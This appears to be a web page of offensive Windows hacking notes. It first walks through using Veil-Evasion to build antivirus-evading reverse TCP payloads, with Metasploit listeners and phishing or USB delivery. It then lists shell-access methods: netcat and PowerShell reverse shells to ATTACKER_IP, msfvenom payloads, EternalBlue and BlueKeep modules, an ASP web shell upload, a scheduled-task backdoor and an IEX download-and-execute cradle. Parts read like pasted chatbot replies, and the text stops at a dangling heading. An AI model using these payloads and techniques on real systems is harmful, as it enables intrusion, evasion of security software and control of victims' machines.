Explore

Reverse TCP Windows

Windows

Veil-Evasion is a tool used for creating payloads that evade detection by antivirus programs. It's commonly used in penetration testing to generate obfuscated payloads that are more likely to bypass security software.

Here's a step-by-step guide on how to use Veil-Evasion:

⁠

Step 1: Install Veil-Evasion

First, you'll need to install Veil-Evasion. It’s commonly used on Kali Linux, but it can be installed on other Linux distributions as well. Follow these steps:

Update your system: Open a terminal and run:

sudo apt update && sudo apt upgrade -y

Install Veil-Evasion from the Kali repository: Veil is included in the default Kali Linux repositories. You can install it by running:

sudo apt install veil

Verify the installation: After installation, confirm Veil-Evasion is working:

veil-evasion

This will launch the Veil-Evasion interface.

⁠

Step 2: Start Veil-Evasion

Once installed, you can start Veil-Evasion by running:

veil-evasion

This should open the Veil-Evasion interactive menu. You will see a list of options you can choose from to generate payloads.

⁠

Step 3: Choose the Payload

Veil-Evasion supports various types of payloads, including Windows, Linux, MacOS, and Java payloads. To choose a payload, follow these steps:

From the main Veil-Evasion menu, type list to display available payloads:

list

Pick the desired payload from the list. For example, if you want to create a Windows reverse TCP payload, you can choose:

use windows/meterpreter/reverse_tcp

This will load the specified payload into the Veil-Evasion interface.

⁠

Step 4: Configure the Payload

Now that you've selected a payload, you can configure it by specifying various parameters such as IP addresses, port numbers, and other settings.

Set the LHOST (local host) and LPORT (local port):

LHOST: This is the local IP address of the machine that will receive the connection (your attacker's machine).

LPORT: This is the port number the payload will use for the reverse connection.

Set these values by typing the following commands:

set LHOST <your IP address>

set LPORT <desired port>

Example:

set LHOST 192.168.1.10

set LPORT 4444

Set additional options:

You may want to adjust other settings depending on the type of payload. For example, if you’re using a Windows executable, you can set the EXITFUNC option (which determines the exit function when the payload finishes) or use Encoder options.

⁠

Step 5: Generate the Payload

Once you've configured the payload, you can generate the obfuscated payload by running:

generate

Veil-Evasion will now generate an executable file that is obfuscated to evade antivirus detection.

Choose the output location where you want to save the generated payload.

The payload will be saved as a .exe (for Windows) or other respective file extensions.

⁠

Step 6: Set Up a Listener (Metasploit)

After generating the payload, you need to set up a listener to catch the reverse shell or meterpreter session when the victim executes the payload.

Start Metasploit in a separate terminal:

msfconsole

Set up a multi/handler listener:

use exploit/multi/handler

Set the payload to match the one generated:

set payload windows/meterpreter/reverse_tcp

Set the LHOST and LPORT to match the values you used in Veil-Evasion:

set LHOST 192.168.1.10

set LPORT 4444

Start the listener:

run

⁠

Step 7: Deliver the Payload

Now that you've set up the listener, you need to deliver the generated payload to the target machine. You can use various methods to deliver the payload, such as:

Social engineering (email attachments, malicious links, etc.).

Exploit kits or USB drops.

Network attacks like SMB or RDP.

Once the victim executes the payload, your Metasploit listener should catch the reverse shell, and you will have access to the target machine.

⁠

Step 8: Interact with the Session

Once the victim executes the payload, you should see a session in Metasploit:

sessions -i 1

Now you can interact with the session using Metasploit's commands, such as:

sysinfo # Get system information

shell # Open a command shell on the target

⁠

Step 9: Post-Exploitation

After gaining access to the target machine, you can use Metasploit's post-exploitation modules for further actions, such as gathering information, escalating privileges, or maintaining persistence.

⁠

Conclusion

Veil-Evasion is a powerful tool for generating obfuscated payloads that can bypass antivirus detection. By using Veil-Evasion and Metasploit together, you can effectively exploit vulnerabilities in target machines. Always remember to perform penetration testing in a legal and ethical manner.

If you run into issues, ensure your network settings are correct, and check that the Metasploit listener is running and correctly configured.

Below is a collection of Windows exploitation methods focusing on shell access. The methods are divided into two categories:

User Involvement: Exploiting Windows systems with user interaction.

No User Involvement: Exploiting Windows systems through services, backdoors, or vulnerabilities.

⁠

1. Gaining Shell Access via User Interaction

Step 1: Exploit SMB with Weak Credentials

Login via SMB:

smbclient //TARGET_IP/C$ -U username

Upload Reverse Shell:

put nc.exe

put reverse_shell.bat

Reverse Shell Script:

echo nc.exe -e cmd.exe ATTACKER_IP 4444 > reverse_shell.bat

Execute Reverse Shell:

Run the .bat file via RDP or ask the user to click it.

⁠

Step 2: Phishing via Malicious Payload

Create a Malicious Payload with msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o payload.exe

Host Payload on HTTP Server:

python3 -m http.server 8080

Convince User to Download:

powershell -c "Invoke-WebRequest -Uri http://ATTACKER_IP:8080/payload.exe -OutFile C:\Users\Public\payload.exe"

Execute the Payload:

Ask the user to run the .exe file.

⁠

Step 3: Exploiting Windows Shortcut Files

Create Malicious LNK File:

msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f lnk -o malicious.lnk

Send to Target User:

Share via email or USB.

⁠

Step 4: PowerShell Payload

Generate PowerShell Reverse Shell Command:

echo $client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() > reverse.ps1

Ask User to Execute:

powershell -ExecutionPolicy Bypass -File reverse.ps1

⁠

Step 5: Trick User into Running Netcat:

Host Netcat Binary:

cp /usr/bin/nc.exe .

python3 -m http.server 8080

Ask User to Download and Execute:

powershell -c "Invoke-WebRequest -Uri http://ATTACKER_IP:8080/nc.exe -OutFile C:\Users\Public\nc.exe"

nc.exe -e cmd.exe ATTACKER_IP 4444

⁠

2. Gaining Shell Access Without User Involvement

Step 1: EternalBlue Exploit (MS17-010)

Using Metasploit:

msfconsole

use exploit/windows/smb/ms17_010_eternalblue

set RHOST TARGET_IP

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST ATTACKER_IP

run

⁠

Step 2: SMB Relay Attack

Using ntlmrelayx:

Start SMB relay server:

ntlmrelayx.py -tf targets.txt -smb2support -c "cmd.exe"

Add the target Windows machine IP in targets.txt.

⁠

Step 3: Exploit RDP Vulnerabilities

BlueKeep (CVE-2019-0708):

msfconsole

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

set RHOST TARGET_IP

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST ATTACKER_IP

run

⁠

Step 4: Exploit Windows SMB Service

Metasploit exploit:

msfconsole

use exploit/windows/smb/psexec

set RHOST TARGET_IP

set SMBUser Administrator

set SMBPass password123

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST ATTACKER_IP

set LPORT 4444

run

⁠

Step 5: Exploiting IIS

Upload Malicious ASP Reverse Shell:

Generate an ASP payload:

msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f asp -o shell.asp

Upload to IIS server (via file upload feature if available):

curl -T shell.asp http://TARGET_IP/uploads/

Trigger the payload:

curl http://TARGET_IP/uploads/shell.asp

⁠

Step 6: Task Scheduler Backdoor

Schedule Malicious Payload:

Connect via SMB:

smbclient //TARGET_IP/C$ -U admin

Upload Payload:

put reverse_shell.bat

Add Scheduled Task:

schtasks /create /tn "Backdoor" /tr "C:\Users\Public\reverse_shell.bat" /sc minute /mo 1

⁠

Step 7: Windows DCOM Exploit

Metasploit DCOM Exploit:

msfconsole

use exploit/windows/dcom/ms03_026_dcom

set RHOST TARGET_IP

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST ATTACKER_IP

set LPORT 4444

run

⁠

Step 8: Exploit Open RDP

Connect to RDP Service:

xfreerdp /u:username /p:password /v:TARGET_IP

Execute Commands Remotely:

powershell.exe -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')"

⁠

Step 9: Exploit Windows Services Misconfiguration

Using Metasploit Service Exploit:

msfconsole

use exploit/windows/local/service_permissions

set SESSION [Active Meterpreter Session ID]

run

⁠

These methods cover various user-involved and non-user-involved shell exploitation techniques for Windows systems. Let me know if you want to go deeper into any of these or add more!

Here are additional methods to exploit Windows systems, focusing on gaining shell access both with and without user involvement:

Want to print your doc?
This is not the way.

Try clicking the ··· in the right corner or using a keyboard shortcut (

CtrlP

) instead.